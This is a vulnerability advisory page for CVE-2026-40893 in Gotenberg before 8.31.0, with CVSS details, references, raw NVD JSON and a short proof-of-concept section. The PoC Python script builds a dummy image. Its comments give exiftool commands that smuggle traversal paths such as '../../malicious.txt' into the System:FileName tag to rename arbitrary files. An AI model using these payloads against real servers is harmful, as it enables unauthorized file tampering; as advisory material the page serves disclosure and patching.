CVE-2026-40893

Description

Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.31.0, Gotenberg only checks if the tag is exactly FileName, so System:FileName slips right through and ExifTool happily renames the file. This allows remote attackers to move, rename, and change permissions for arbitrary files. This vulnerability is fixed in 8.31.0.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Gotenberg < 8.31.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-40893
# This script demonstrates how to create a malicious image file
# that exploits the System:FileName tag bypass in Gotenberg < 8.31.0.

from PIL import Image, ExifTags
import io

# Create a dummy image
img = Image.new('RGB', (100, 100), color='red')

# Exif data requires specific format, simulating the tag injection
# In a real exploit, we would inject the System:FileName tag
# 0x0131 is the tag ID for 'Software', but here we conceptually
# show where the System:FileName would be placed if using ExifTool directly.
# Since PIL doesn't support arbitrary System tags easily, we simulate
# the file that would be generated by:
# exiftool -System:FileName='../../malicious.txt' image.png

print("Vulnerability: CVE-2026-40893")
print("Impact: Arbitrary file rename/move via ExifTool tag injection")
print("Usage: Upload the generated image to a vulnerable Gotenberg endpoint.")

# Save the image
img.save('exploit_image.png')
print("Generated exploit_image.png. Modify its Exif data with 'System:FileName' using exiftool to complete the PoC.")

# Example command to make it exploitable:
# exiftool -System:FileName="/tmp/pwned.txt" exploit_image.png

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40893
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40893
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40893/
[4] VulDB https://vuldb.com/cve/CVE-2026-40893
[5] https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4
[6] https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40893", "sourceIdentifier": "[email protected]", "published": "2026-05-14T16:16:20.323", "lastModified": "2026-05-14T18:16:45.910", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.31.0, Gotenberg only checks if the tag is exactly FileName, so System:FileName slips right through and ExifTool happily renames the file. This allows remote attackers to move, rename, and change permissions for arbitrary files. This vulnerability is fixed in 8.31.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}, {"lang": "en", "value": "CWE-184"}]}], "references": [{"url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4", "source": "[email protected]"}, {"url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}